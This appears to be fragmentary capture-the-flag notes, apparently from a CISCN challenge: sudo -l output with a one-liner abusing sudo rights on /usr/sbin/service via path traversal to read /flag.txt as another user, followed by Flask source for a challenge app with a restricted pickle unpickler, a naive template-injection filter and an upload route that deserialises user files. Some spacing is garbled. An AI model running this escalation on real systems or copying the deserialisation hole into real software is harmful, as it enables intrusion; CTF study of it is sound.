sudo -l Matching Defaults entries for ciscn on 20c26fd45569: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User ciscn may run the following commands on 20c26fd45569: (dragon_lord : dragon_lord) NOPASSWD: /home/dragon_lord/Wait_3_years (dragon_lord : dragon_lord) NOPASSWD: /usr/sbin/service
cd /usr/bin && sudo -u dragon_lord /usr/sbin/service …/…/bin/cat /flag.txt
deffind_class(self, module, name): if module == "__main__"and name == 'webSite': return webSite # Forbid everything else. raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
defrestricted_loads(s): """Helper function analogous to pickle.loads().""" return RestrictedUnpickler(io.BytesIO(s)).load()
site=webSite()
@app.route('/') defnone(): return redirect('/index.php') @app.route('/index.php') defindex(): global site try: if ("{"in site.name and"}"in site.name) or ("{"in site.describe and"}"in site.describe): if ('LOL, No SSTI'notin site.name )and ('LOL, No SSTI'notin site.describe): site.name+="LOL, No SSTI" site.describe+="LOL, No SSTI" return render_template('index.html',name=site.name,des=site.describe,img='hit.gif',hit='1000') return render_template('index.html',name=site.name,des=site.describe,img='waizui.png',hit='500') except Exception: site=webSite(name='Error',describe='Error') return render_template('index.html',name=site.name,des=site.describe,img='waizui.png',hit='500') @app.route('/manage.php',methods=["GET","POST"]) defmanage(): global site newName=request.args.get("name") newdes=request.args.get('describe') if newName: site.name=newName if newdes: site.describe=newdes withopen('./data.pickle','wb')as f: pickle.dump(site,f) return redirect('/')
@app.route('/data.pickle') defpull(): global site withopen('./data.pickle','wb')as f: pickle.dump(site,f) return send_from_directory('./','data.pickle',as_attachment=True) @app.route('/push.php',methods=['POST']) defpush(): if request.method == 'POST': if'file'notin request.files: return('No File!') file = request.files['file'] if file.filename == '': return'no File Name!' filename = secure_filename(file.filename) file.save(filename) if1: withopen('./'+filename,'rb') as f: s=f.read() # if b'R' in s: # return ''' # NO "R" !! NO __REDUCE__()!! # ''' global site # site=pickle.loads(s) try: site = restricted_loads(s) except pickle.UnpicklingError: site = webSite(name='Error',describe='Error') return redirect('/')